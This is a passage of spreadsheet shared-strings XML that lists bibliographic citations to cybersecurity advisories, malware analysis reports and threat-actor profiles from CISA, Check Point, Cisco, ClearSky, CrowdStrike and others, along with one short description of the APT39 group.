    <t>CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021.</t>
  </si>
  <si>
    <t>CISA. (2022, February 26). Destructive Malware Targeting Organizations in Ukraine. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>CISA. (2018, December 18). Analysis Report (AR18-352A) Quasar Open-Source Remote Administration Tool. Retrieved August 1, 2022.</t>
  </si>
  <si>
    <t>CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.</t>
  </si>
  <si>
    <t>Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.</t>
  </si>
  <si>
    <t>CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.</t>
  </si>
  <si>
    <t>Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.</t>
  </si>
  <si>
    <t>CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.</t>
  </si>
  <si>
    <t>CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved November 16, 2020.</t>
  </si>
  <si>
    <t>DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware . Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.</t>
  </si>
  <si>
    <t>USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.</t>
  </si>
  <si>
    <t>CISA, FBI, DOD. (2021, August). MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022.</t>
  </si>
  <si>
    <t>CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.</t>
  </si>
  <si>
    <t>CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.</t>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.</t>
  </si>
  <si>
    <t>CISA. (2021, January 27). Malware Analysis Report (AR21-027A). Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.</t>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.</t>
  </si>
  <si>
    <t>CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.</t>
  </si>
  <si>
    <t>byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020.</t>
  </si>
  <si>
    <t>Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Clayton, M.. (2012, September 14). Stealing US business secrets: Experts ID two huge cyber 'gangs' in China. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t xml:space="preserve"> Ishaq Mohammed . (2021, January 10). Everything about CSV Injection and CSV Excel Macro Injection. Retrieved February 7, 2022.</t>
  </si>
  <si>
    <t>Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability in macOS and iOS. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019.</t>
  </si>
  <si>
    <t>Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Matt Muir. (2022, April 6). Cado Discovers Denonia: The First Malware Specifically Targeting Lambda. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Camba, A. (2013, February 27). BKDR_RARSTONE: New RAT to Watch Out For. Retrieved January 8, 2016.</t>
  </si>
  <si>
    <t>ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.</t>
  </si>
  <si>
    <t>Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.</t>
  </si>
  <si>
    <t>Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.</t>
  </si>
  <si>
    <t>Lee, S.. (2019, May 14). JCry Ransomware. Retrieved June 18, 2019.</t>
  </si>
  <si>
    <t>Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.</t>
  </si>
  <si>
    <t>Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.</t>
  </si>
  <si>
    <t>CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.</t>
  </si>
  <si>
    <t>Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Carnegie Mellon University. (2020, December 26). SolarWinds Orion API authentication bypass allows remote command execution. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Cary, M. (2018, December 6). Locked File Access Using ESENTUTL.exe. Retrieved September 5, 2019.</t>
  </si>
  <si>
    <t>Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.</t>
  </si>
  <si>
    <t>Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.</t>
  </si>
  <si>
    <t>Activities associated with APT39 largely align with a group publicly referred to as Chafer.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: Dark Reading APT39 JAN 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)</t>
  </si>
  <si>
    <t>Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.</t>
  </si>
  <si>
    <t>Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.</t>
  </si>
  <si>
    <t>Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.</t>
  </si>
  <si>
    <t>Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Check Point Research Team. (2021, August 14). Indra - Hackers Behind Recent Attacks on Iran. Retrieved February 17, 2022.</t>
  </si>
  <si>
    <t>Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.</t>
  </si>
  <si>
    <t>Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.</t>
  </si>
  <si>
    <t>Check Point Research. (2020, December 22). SUNBURST, TEARDROP and the NetSec New Normal. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021.</t>
  </si>
  <si>
    <t>Check Point. (2020, November 26). Bandook: Signed &amp; Delivered. Retrieved May 31, 2021.</t>
  </si>
  <si>
    <t>Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Eisenkraft, K., Olshtein, A. (2019, October 17). Pony’s C&amp;C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.</t>
  </si>
  <si>
    <t>Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.</t>
  </si>
  <si>
    <t>CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.</t>
  </si>
  <si>
    <t>Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022.</t>
  </si>
  <si>
    <t>Murilo, N., Steding-Jessen, K. (2017, August 23). Chkrootkit. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.</t>
  </si>
  <si>
    <t>Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.</t>
  </si>
  <si>
    <t>Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.</t>
  </si>
  <si>
    <t>CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>King, J., Lauerman, K. (2016, January 22). ARP Poisoning (Man-in-the-Middle) Attack and Mitigation Technique. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Malhotra, A. (2022, March 15). Threat Advisory: CaddyWiper. Retrieved March 23, 2022.</t>
  </si>
  <si>
    <t>Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.</t>
  </si>
  <si>
    <t>Esler, J., Lee, M., and Williams, C. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Reynolds, J.. (2016, September 13). H1N1: Technical analysis reveals new capabilities. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Reynolds, J.. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS Forensics. Retrieved October 21, 2020.</t>
  </si>
  <si>
    <t>George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Change Control. Retrieved October 21, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Credentials Management. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Deploy Signed IOS. Retrieved October 21, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Image File Integrity. Retrieved October 21, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Cisco. (2006, May 10). Securing Simple Network Management Protocol. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.</t>
  </si>
  <si>
    <t>N. Baisini. (2022, July 13). Transparent Tribe begins targeting education sector in latest campaign. Retrieved September 22, 2022.</t>
  </si>
  <si>
    <t>Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Biasini, N. et al.. (2022, January 21). Ukraine Campaign Delivers Defacement and Wipers, in Continued Escalation. Retrieved March 14, 2022.</t>
  </si>
  <si>
    <t>Scarfo, A. (2016, October 10). Domain Generation Algorithms – Why so effective?. Retrieved February 18, 2019.</t>
  </si>
  <si>
    <t>Kasza, A. (2015, February 18). Using Algorithms to Brute Force Algorithms. Retrieved February 18, 2019.</t>
  </si>
  <si>
    <t>Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>Scott-Railton, J., et al. (2016, August 2). Group5: Syria and the Iranian Connection. Retrieved September 26, 2016.</t>
  </si>
  <si>
    <t>Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.</t>
  </si>
  <si>
    <t>Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.</t>
  </si>
  <si>
    <t>Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019.</t>
  </si>
  <si>
    <t>Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Ciubotariu, M. (2014, January 23). Trojan.Zeroaccess.C Hidden in NTFS EA. Retrieved December 2, 2014.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017.</t>
  </si>
  <si>
    <t>ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.</t>
  </si>
  <si>
    <t>ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.</t>
  </si>
  <si>
    <t>ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.</t>
  </si>
  <si>
    <t>ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.</t>
  </si>
  <si>
    <t>ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.</t>
  </si>
  <si>
    <t>ClearSky and Trend Micro. (2017, July). Operation Wilted Tulip - Exposing a cyber espionage apparatus. Retrieved May 17, 2021.</t>
  </si>
  <si>
    <t>ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Google. (n.d.). Audit Logs. Retrieved June 1, 2020.</t>
  </si>
  <si>
    <t>CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.</t>
  </si>
  <si>
    <t>Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.</t>
  </si>
  <si>
    <t>Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.</t>
  </si>
  <si>
    <t>Mudge, R. (2017, January 24). Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Strategic Cyber, LLC. (n.d.). Scripted Web Delivery. Retrieved January 23, 2018.</t>
  </si>
  <si>
    <t>Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Doaty, J., Garrett, P.. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.</t>
  </si>
  <si>
    <t>Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.</t>
  </si>
  <si>
    <t>Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2019, September 5). Content trust in Azure Container Registry. Retrieved October 16, 2019.</t>
  </si>
  <si>
    <t>Docker. (2019, October 10). Content trust in Docker. Retrieved October 16, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.</t>
  </si>
  <si>
    <t>Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.</t>
  </si>
  <si>
    <t>Core Security. (n.d.). Impacket. Retrieved November 2, 2017.</t>
  </si>
  <si>
    <t>Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Corio, C., &amp; Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.</t>
  </si>
  <si>
    <t>Costin Raiu. (2020, October 2). Costin Raiu Twitter IAmTheKing SlothfulMedia. Retrieved November 16, 2020.</t>
  </si>
  <si>
    <t>Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.</t>
  </si>
  <si>
    <t>CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.</t>
  </si>
  <si>
    <t>Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.</t>
  </si>
  <si>
    <t>Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.</t>
  </si>
  <si>
    <t>Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.</t>
  </si>
  <si>
    <t>CrowdStrike. (2022, March 30). Who is EMBER BEAR?. Retrieved June 9, 2022.</t>
  </si>
  <si>
    <t>Dahl, M.. (2014, May 13). Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>CrowdStrike. (2019, January). 2019 Global Threat Report. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&amp;CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.</t>
  </si>
  <si>
    <t>CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022.</t>
  </si>
  <si>
    <t>CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.</t>
  </si>
  <si>
    <t>Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.</t>
  </si>
  <si>
    <t>Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.</t>
  </si>
  <si>
    <t>Orleans, A. (2020, August 31). Who Is PIONEER KITTEN?. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>CrowdStrike. (2021, September 30). Adversary Profile - Richochet Chollima. Retrieved September 30, 2021.</t>
  </si>
  <si>
    <t>Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.</t>
  </si>
  <si>
    <t>CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.</t>
  </si>
  <si>
    <t>CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Meyers, Adam. (2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.</t>
  </si>
  <si>
    <t>Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.</t>
  </si>
  <si>
    <t>Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.</t>
  </si>
  <si>
    <t>Crowdstrike. (2013, October 16). CrowdCasts Monthly: You Have an Adversary Problem. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022.</t>
  </si>
  <si>
    <t>Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Podlosky, A., Feeley, B. (2021, March 17). INDRIK SPIDER Supersedes WastedLocker with Hades Ransomware to Circumvent OFAC Sanctions. Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.</t>
  </si>
  <si>
    <t>CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.</t>
  </si>
  <si>
